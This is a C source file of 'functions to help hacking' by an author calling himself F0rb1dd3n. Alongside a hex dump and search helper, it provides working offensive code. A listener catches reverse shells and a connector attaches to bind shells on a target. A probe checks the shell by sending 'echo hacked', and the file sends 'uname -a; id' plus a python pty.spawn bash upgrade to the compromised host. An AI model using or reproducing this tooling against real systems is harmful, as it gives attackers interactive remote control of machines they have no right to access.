/*
 * Written by F0rb1dd3n
 *
 * Functions to help hacking, enjoy!
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char good[] = "\e[01;34m[\e[00m+\e[01;34m]\e[00m";
char bad[] = "\e[01;31m[\e[00m-\e[01;31m]\e[00m";
char warn[] = "\e[01;33m[\e[00m!\e[01;33m]\e[00m";

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[129];

   strcpy(error_message, bad);
   strncat(error_message, " Error ", 7); 
   strncat(error_message, message, 93);
   perror(error_message);
   printf("\n\n");
   exit(-1);
}

// dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
   unsigned char byte;
   unsigned int i, j;
   for(i=0; i < length; i++) {
      byte = data_buffer[i];
      printf("%02x ", data_buffer[i]);
      if(((i%16)==15) || (i==length-1)) {
	 for(j=0; j < 15-(i%16); j++)
	    printf("   ");
	 printf("| ");
	 for(j=(i-(i%16)); j <= i; j++) {
	    byte = data_buffer[j];
	    if((byte > 31) && (byte < 127))
	       printf("%c", byte);
	    else
	       printf(".");
	 }
	 printf("\n");
      }
   }
   printf("\n");
}

int index_of(const unsigned char *data_buffer, const unsigned int length, 
   const unsigned char *needle, const unsigned int needlelen){
   int k;
   for(k=0; k < length; k++){
      if(memcmp(data_buffer+k, needle, needlelen) == 0){
         return k;
      }
   }
   return -1;
}

int checkshell(int fd) {
  char got[32];

  if (write (fd, "echo hacked\n", 12) < 0)
    return -1;

  if (read (fd, got, 32) <= 0)
    return -1;

  return -!strstr (got, "hacked");
}

void shell(int fd) {
    fd_set fds;
    char tmp[0xffff];
    int n;
    
    for (;;) {
	FD_ZERO(&fds);
	FD_SET(fd, &fds);
	FD_SET(0, &fds);

	if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
	    fatal("select");
	    break;
	} 

        /* read from fd and write to stdout */
	if (FD_ISSET(fd, &fds)) {
	   if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
	       fatal("on receive data");
	       break;
	   }
	   if (write(1, tmp, n) < 0) {
	       fatal("write");
	       break;
	   }
	}

	/* read from stdin and write to fd */
	if (FD_ISSET(0, &fds)) {
	    if ((n = read(0, tmp, sizeof(tmp))) < 0) {
	        fatal("read");
	        break;
	    }
	    if (write(fd, tmp, n) < 0) {
	        fatal("on send data");
	        break;
	    }
	    if(strncmp(tmp, "exit\n", 5) == 0) {
	        write(STDOUT_FILENO, "Goodbye!\n", 9);
		break;
	    }
	}
    }
}

void listener(int port) {
	int sockfd, new_sockfd;
	struct sockaddr_in host_addr, client_addr;
	socklen_t sin_size;
	int r_length=1, yes=1;
	char buff[256];

	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
		fatal("in socket");

	host_addr.sin_family = AF_INET;
	host_addr.sin_port = port;
	host_addr.sin_addr.s_addr = INADDR_ANY;
	memset(&(host_addr.sin_zero), '\0', 8);

	if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
		fatal("binding to socket");

	if (listen(sockfd, 5) == -1) {
		fatal("listening on socket");
	} else {
		printf("%s Listening on port %d...\n", good, port);
	}

	sin_size = sizeof(struct sockaddr_in);
	new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
	if(new_sockfd == -1)
		fatal("accepting connection");

	printf("%s Connection from %s port %d...", good, inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
		
	if(checkshell(new_sockfd) == -1) {
		fatal("reverse shell not openned");
	} else {
		printf(" Shell is openned!\n\n");
	}
	
        send(new_sockfd, "uname -a; id; echo; export TERM=linux; python -c 'import pty;pty.spawn(\"/bin/bash\")';\n", 95, 0);
	shell(new_sockfd);
	send(new_sockfd, "exit\n", 5, 0); // because of python pty it is necessary exit 2 times
	close(new_sockfd);
	close(sockfd);
}

void bind_conn(char *host, int port){
	int sockfd;
   	struct hostent *host_info;
	struct sockaddr_in target_addr;

   	if((host_info = gethostbyname(host)) == NULL)
      		fatal("looking up hostname");

   	target_addr.sin_family = AF_INET;
   	target_addr.sin_port = port;   
   	target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
   	memset(&(target_addr.sin_zero), '\0', 8); // zero the rest of the struct
  
   	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      		fatal("in socket");

   	printf("\nConnecting on port %d...\n", port);

   	if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1){
      		fatal("on connecting to target server");
   	} else {
      		printf("%s Connected...", good);
   	}

	if(checkshell(sockfd) == -1) {
		fatal(" but shell not openned");
	} else {
		printf(" Shell is openned!\n\n");
	}
	
	send(sockfd, "uname -a; id; echo; export TERM=linux;\n", 39, 0); 
	send(sockfd, "python -c 'import pty;pty.spawn(\"/bin/bash\")';\n", 47, 0);
	shell(sockfd);
	send(sockfd, "exit\n", 5, 0); // because of python pty it is necessary exit 2 times
	close(sockfd);
}